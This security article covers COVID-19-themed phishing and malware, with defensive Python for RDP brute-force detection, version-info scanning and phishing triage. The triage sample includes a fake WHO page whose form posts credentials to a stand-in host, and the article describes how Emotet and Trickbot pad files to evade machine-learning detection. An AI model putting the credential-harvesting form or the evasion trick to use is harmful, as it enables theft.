Cybercrooks Use Global Pandemic to Take Advantage of Coronavirus Malware

With the World Health Organization officially declaring the COVID-19 infection a pandemic, more countries around the world are taking further action to contain the spread of the virus. In this time of crisis, hackers have taken the opportunity to exploit the mass panic surrounding the Coronavirus strain to spread malware and make a profit.



Remote Access Can Be a Threat to Organizations

In some countries a nationwide quarantine is in force, leaving many businesses and organizations no option but to have their employees work remotely from home. Adapting a security model to that on such short notice is hard, and where access and usability take priority over security, the risk of cyber-attacks rises significantly.


The main problem is not providing a remote working option that scales, but keeping the network secure while doing so. Most organizations rely on RDP (Remote Desktop Protocol) and enterprise VPN solutions to reach the office network and servers. RDP conveniently lets an employee work on an office machine from home, but it was also the most common attack vector for ransomware in the first quarter of 2019, and credentials for RDP services exposed to the internet are routinely harvested through brute-force and credential-stuffing attacks.


When a company opens remote access so that employees can work from home, it is strongly recommended to reset all passwords, require stronger ones, and enforce MFA (multi-factor authentication). This matters because many employees reuse the same password across several online services, so a password leaked from one of them can be replayed against the company's remote access, and the personal information exposed along the way ends up for sale on dark web markets.
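The RDP exposure described above shows up in the Windows Security log as bursts of failed logons. The following is an added example, not code from the original article, that flags brute force and password spraying from a single source and records when a burst of failures is followed by a success from the same address, which is the moment a password reset and MFA become urgent rather than advisable. The event lines are constructed for the example; a real export from a SIEM or Event Viewer carries the same fields under different names.

```python
"""Added example, not code from the original article: spot brute-force and
password-spray attacks against remote logons in Windows Security events, and
note when a burst of failures is followed by a success from the same source."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample, not real telemetry, one event per line:
#   <ISO time> <event id> <logon type> <account> <source ip>
# 4625 = failed logon, 4624 = successful logon. Logon type 10 is RDP
# (RemoteInteractive); with Network Level Authentication, guessed RDP
# credentials fail as logon type 3 (Network) before any session exists,
# so both types are treated as remote-access attempts.
SAMPLE_EVENTS = """\
2020-03-16T08:00:00 4625 3 administrator 203.0.113.7
2020-03-16T08:00:10 4625 3 administrator 203.0.113.7
2020-03-16T08:00:20 4625 3 administrator 203.0.113.7
2020-03-16T08:00:30 4625 3 administrator 203.0.113.7
2020-03-16T08:00:40 4625 3 administrator 203.0.113.7
2020-03-16T08:00:50 4625 3 administrator 203.0.113.7
2020-03-16T08:01:00 4625 3 administrator 203.0.113.7
2020-03-16T08:01:10 4625 3 administrator 203.0.113.7
2020-03-16T08:01:20 4625 3 administrator 203.0.113.7
2020-03-16T08:01:30 4625 3 administrator 203.0.113.7
2020-03-16T08:01:40 4624 10 administrator 203.0.113.7
2020-03-16T08:05:00 4625 3 alice 198.51.100.9
2020-03-16T08:05:20 4625 3 bob 198.51.100.9
2020-03-16T08:05:40 4625 3 carol 198.51.100.9
2020-03-16T08:06:00 4625 3 dave 198.51.100.9
2020-03-16T08:06:20 4625 3 erin 198.51.100.9
2020-03-16T08:09:00 4625 10 frank 192.0.2.10
2020-03-16T08:09:30 4624 10 frank 192.0.2.10
"""


def parse_events(text):
    """Parse the sample format into (time, event_id, logon_type, account, ip), oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, logon_type, account, ip = line.split()
        events.append((datetime.fromisoformat(ts), int(event_id), int(logon_type), account, ip))
    return sorted(events)


def detect_remote_logon_attacks(events, window=timedelta(minutes=5),
                                max_failures=10, spray_accounts=5):
    """Return {source_ip: alert}. An alert is raised when one source produces
    `max_failures` failed logons inside `window` (brute force) or fails against
    `spray_accounts` different accounts (password spray). A later successful
    logon from an alerted source is recorded in `success_after`: that is the
    sign the guess worked and the account needs a reset and MFA, not just a block."""
    recent = defaultdict(deque)   # ip -> (time, account) of failures inside the window
    alerts = {}
    for ts, event_id, logon_type, account, ip in events:
        if logon_type not in (3, 10):
            continue
        window_failures = recent[ip]
        while window_failures and ts - window_failures[0][0] > window:
            window_failures.popleft()
        if event_id == 4625:
            window_failures.append((ts, account))
            accounts = sorted({a for _, a in window_failures})
            if ip in alerts:
                alerts[ip].update(failures=alerts[ip]["failures"] + 1, last=ts, accounts=accounts)
            elif len(window_failures) >= max_failures or len(accounts) >= spray_accounts:
                kind = "brute_force" if len(window_failures) >= max_failures else "password_spray"
                alerts[ip] = {"kind": kind, "failures": len(window_failures), "accounts": accounts,
                              "first": window_failures[0][0], "last": ts, "success_after": None}
        elif event_id == 4624 and ip in alerts and alerts[ip]["success_after"] is None:
            alerts[ip]["success_after"] = (ts, account)
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_remote_logon_attacks(parse_events(SAMPLE_EVENTS)).items():
        print(ip, alert["kind"], alert["failures"], "failures against", alert["accounts"],
              "then success as", alert["success_after"][1] if alert["success_after"] else "nobody")
```

The thresholds are deliberately parameters: a VPN concentrator that fronts RDP will show one source address for many legitimate users, so tune `max_failures` and `spray_accounts` per source before alerting on it.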


A report from Cloudflare states that, with so many people staying at home at the same time, general internet usage has increased globally:


"As more people work from home, peak traffic in the affected regions has increased, on average, by around 10%. In Italy, which has imposed a nationwide quarantine, peak internet traffic has increased by 30%. Traffic patterns have also changed so that peak traffic is occurring earlier in the day in affected areas."


Malicious Actors Exploit the Coronavirus Outbreak for Phishing Purposes

No significant global event has gone untapped by cybercriminals for phishing. With the COVID-19 pandemic keeping people in a constant state of panic, attracting unsuspecting victims is easy. Users are lured with false promises of breakthrough discoveries or the latest news on the Coronavirus strain, delivered as a link to a shady site or as an infected attachment; one click is enough to infect the device with the Coronavirus-themed malware.


According to Action Fraud (the UK's national fraud and cyber crime reporting centre), coronavirus scams cost victims more than £800,000 in February 2020 alone.


Check Point reports that since the start of 2020, more than 4,000 coronavirus-related domains have been registered, many of which are suspected of being intended for phishing activity.


Coronavirus spam campaigns and comment bots abound on the internet


Fake news and disinformation about the dreaded Coronavirus have become weapons not only for political ends but also for cybercriminal activity.


More and more spam campaigns about the COVID-19 outbreak are sent every day. They claim to come from official organizations offering legitimate information about the Coronavirus strain, and prompt the recipient to follow a shady link or open an attachment.


Sophos's security team has warned of an email purporting to come from the World Health Organization (WHO) about Coronavirus awareness. The message carries the WHO logo and states:


"Browse the attached document on Safety Precautions Regarding the Spread of Corona Virus.

Click the button below to download

The most common symptoms are fever, cough, shortness of breath, and difficulty breathing."


Clicking the link leads to a site on an odd-looking domain with no connection to the WHO, served over plain HTTP rather than HTTPS. In the background the site loads the official WHO pages in a frame, with a pop-up "email verification" form layered on top; whatever the victim types into that form goes to the attacker, not to the WHO.


Aside from scam emails, comment spamming is another popular method. Bots inject the word "Coronavirus" into comment sections because it is currently one of the most searched terms, and the search algorithms reward the page with a significantly better ranking. Comment spam also appears on legitimate, trusted sites, which draw large readerships; coronavirus-related clickbait in their comment sections pulls in even more unsuspecting victims.


Threats like Emotet and Trickbot use coronavirus news to evade detection

According to reports from January 2020, the Trickbot and Emotet Trojans were seen using text about President Trump's impeachment to slip past security software that relies on AI or machine-learning detection. Because the scheme proved effective, both Trojans keep using it: the added text makes the samples look harmless, and antivirus fails to detect the malicious code they carry. This time the text is taken from news about the Coronavirus.


Closer examination of the Emotet and Trickbot samples showed that they take text from CNN news stories and embed it in the file's version information. The text is visible in the Details tab of the file's Properties window in Windows.


This trick helps evade security software with artificial intelligence (AI) and machine-learning features: because such a classifier scores the file's features as a whole, padding the sample with ordinary prose pushes its verdict toward benign. The same metadata that fools the classifier is also easy to inspect, and a version-information field that reads like a news article is itself a strong indicator.
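The padded version information is a detectable artifact in its own right. Below is an added example, not code from the original article or from any vendor, that extracts the UTF-16 strings of a Windows executable's version resource without a PE parsing library and flags any field holding running prose. The version-info keys and the VS_VERSION_INFO marker are the standard Windows names; the sample binaries in the test are constructed byte strings, not real malware.

```python
"""Added example, not code from the original article: pull the UTF-16 version-
information strings out of a Windows executable and flag fields that contain
running prose, which is where the padded Emotet and Trickbot samples carry
their news text. Standard library only; no PE parsing package is needed."""
import re
import sys

# Field names found in a VS_VERSIONINFO StringFileInfo block (the Details tab).
VERSION_KEYS = {
    "FileDescription", "Comments", "CompanyName", "ProductName",
    "LegalCopyright", "LegalTrademarks", "InternalName", "OriginalFilename",
    "FileVersion", "ProductVersion", "PrivateBuild", "SpecialBuild",
}
# The resource opens with this UTF-16LE key; the string table follows it.
VERSION_MARKER = "VS_VERSION_INFO".encode("utf-16le")
# Runs of three or more UTF-16LE code units that are printable ASCII or the
# U+2010..U+2027 punctuation (curly quotes, dashes) common in copied news text.
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00|[\x10-\x27]\x20){3,}")


def version_strings(data: bytes) -> dict:
    """Map each version-info key to its value as found in `data`.

    The table is laid out key, padding, value, key, padding, value, ... so a
    key's value is the next printable run after it. An empty value would make
    the following key look like the value; acceptable for a triage heuristic."""
    start = data.find(VERSION_MARKER)
    if start < 0:
        return {}
    runs = [m.group(0).decode("utf-16le") for m in UTF16_RUN.finditer(data, start)]
    fields = {}
    for key, value in zip(runs, runs[1:]):
        if key in VERSION_KEYS and key not in fields:
            fields[key] = value
    return fields


def narrative_fields(fields: dict, max_words: int = 20) -> dict:
    """Return the fields whose value reads like an article rather than a label.

    Genuine values are short ("Windows Command Processor", "(c) Example Corp.
    All rights reserved."); more than `max_words` words or three or more
    sentences is the shape of the padded samples described above."""
    hits = {}
    for key, value in fields.items():
        sentences = len(re.findall(r"[.!?](?:\s|$)", value))
        if len(value.split()) > max_words or sentences >= 3:
            hits[key] = value
    return hits


def scan_file(path: str, max_words: int = 20) -> dict:
    """Convenience wrapper: narrative version-info fields of one file on disk."""
    with open(path, "rb") as fh:
        return narrative_fields(version_strings(fh.read()), max_words)


if __name__ == "__main__":
    for path in sys.argv[1:]:
        hits = scan_file(path)
        print(f"{path}: {'SUSPICIOUS' if hits else 'ok'}")
        for key, value in hits.items():
            print(f"  {key}: {value[:72]}...")
```

Run it as `python scan_versioninfo.py sample.exe` (name assumed). Because the extractor ignores the structure's length fields, a value containing characters outside the ranges in `UTF16_RUN` is split and only its first fragment is attributed to the key; for a full parser use the resource directory lengths instead.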


Other cases of Coronavirus malware circulating on the internet

The Emotet and Trickbot Trojans are not the only malware taking advantage of the COVID-19 outbreak. Because the pandemic has made people anxious for information about the virus, it provides an ideal pretext for effective cyber-attacks.


For example, the AZORult password-stealing malware was found on questionable websites offering a version of the Coronavirus Infections and Deaths interactive dashboard produced by Johns Hopkins University.


Another example is the Vicious Panda campaign, whose operators use fake COVID-19-related documents to deliver malware and steal personal data. The Chinese actors behind it pose as the Mongolian Ministry of Health sending official information, with the aim of getting the victim to disclose sensitive data.


There is also malware that carries the name "Coronavirus" or "COVID-19" itself, such as the CovidLock ransomware and the CoronaVirus ransomware. What is curious about the latter is that it may actually be a wiper serving as a cover for the installation of the KPOT information-stealing Trojan.


Because COVID-19 continues to be a hot topic globally, cybercriminals will inevitably exploit the situation to their advantage. To make sure you don't fall victim to Coronavirus malware, you should always be careful when online. Here are some steps you can take to prevent this from happening:


Don't be fooled by the sender's name. The display name is not an indicator of legitimacy; compare the sender's actual email address with the real domain of the organization or business it claims to be.

Think carefully before clicking on a link if it looks fishy.

Never enter personal information on a website that shouldn't need it. If you think you've shared login information on a bogus site, you should change your passwords as soon as possible.

Often it is spelling and grammar mistakes that betray attackers. If a large organization or business contacts you by email, its message will not be full of simple mistakes.

Don't feel obliged to follow the instructions in an email. However strongly it urges you to follow a link or open an attachment, think twice before complying. If in doubt, verify the legitimacy of the email and its sender before doing anything rash.
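The sender check above and the framed WHO page described earlier can both be automated. The following is an added example, not code from the original article or from Sophos, that triages a suspicious message: it compares the From and Reply-To headers with the organisation the mail claims to be, then inspects the HTML of the mail and of its landing page for the pattern in the fake WHO lure (links over plain HTTP, the genuine site loaded in a frame, and a form whose action points at a different domain). The email, the landing page and the domain `attacker.example` are constructed for the example; `attacker.example` is a reserved placeholder, not a real phishing domain.

```python
"""Added example, not code from the original article or from Sophos: triage a
coronavirus-themed phishing email along the lines of the advice above. It
compares the sender with the organisation the mail claims to be, then checks
the HTML for what the fake WHO mail did: links over plain HTTP, the genuine
site loaded in a frame, and a form that sends what you type somewhere else."""
import email
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the lure quoted above. attacker.example is an
# RFC 2606 reserved placeholder, not a real phishing domain.
SAMPLE_EML = """\
From: "World Health Organization" <noreply@attacker.example>
Reply-To: covid-info@attacker.example
Subject: Safety Precautions Regarding the Spread of Corona Virus
Content-Type: text/html

<html><body>
<p>Browse the attached document on Safety Precautions Regarding the Spread of Corona Virus.</p>
<a href="http://attacker.example/who/download">Click the button below to download</a>
</body></html>
"""

# Constructed landing page: the real site in a frame, a "verification" form on top.
SAMPLE_PAGE = """\
<html><body>
<iframe src="https://www.who.int/"></iframe>
<form action="http://attacker.example/verify" method="post">
  Email: <input name="email"> Password: <input name="password" type="password">
</form>
</body></html>
"""


def registrable(host):
    """Last two labels of a host name; enough here, use the public suffix list in real tooling."""
    return ".".join(host.lower().split(".")[-2:]) if host else ""


class PageElements(HTMLParser):
    """Collect link targets, form actions and frame sources from HTML."""
    def __init__(self):
        super().__init__()
        self.links, self.forms, self.frames = [], [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "form":
            self.forms.append(a.get("action") or "")
        elif tag == "iframe" and a.get("src"):
            self.frames.append(a["src"])


def check_sender(raw_email, claimed_domain):
    """Findings (code, detail) about From/Reply-To versus the claimed organisation."""
    msg = email.message_from_string(raw_email)
    name, addr = parseaddr(msg.get("From", ""))
    reply_to = parseaddr(msg.get("Reply-To", ""))[1]
    findings = []
    if registrable(addr.rpartition("@")[2]) != claimed_domain:
        findings.append(("sender_domain_mismatch", f'"{name}" <{addr}>'))
    if reply_to and reply_to != addr:
        findings.append(("reply_to_differs", reply_to))
    return findings


def check_html(html, claimed_domain):
    """Findings (code, detail) about where the links, forms and frames really go.
    A relative form action posts to the page's own host and is not flagged here."""
    page = PageElements()
    page.feed(html)
    findings = []
    for url in page.links + page.forms:
        parts = urlparse(url)
        if parts.scheme == "http":
            findings.append(("plain_http", url))
        if parts.netloc and registrable(parts.netloc) != claimed_domain:
            findings.append(("off_domain_target", url))
    genuine_framed = any(registrable(urlparse(f).netloc) == claimed_domain for f in page.frames)
    foreign_form = any(registrable(urlparse(f).netloc) not in ("", claimed_domain) for f in page.forms)
    if genuine_framed and foreign_form:
        findings.append(("genuine_site_framed_behind_foreign_form", page.forms[0]))
    return findings


def triage(raw_email, landing_page, claimed_domain):
    """Run every check; an empty list means nothing obviously wrong was found."""
    body = email.message_from_string(raw_email).get_payload()
    return (check_sender(raw_email, claimed_domain)
            + check_html(body, claimed_domain)
            + check_html(landing_page, claimed_domain))


if __name__ == "__main__":
    for code, detail in triage(SAMPLE_EML, SAMPLE_PAGE, "who.int"):
        print(f"{code}: {detail}")
```

The checks are heuristics that catch the lure described above; a legitimate newsletter sent through a third-party mailing service will also trip `sender_domain_mismatch`, so treat the findings as reasons to verify the message independently, as the advice above says, rather than as a verdict.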
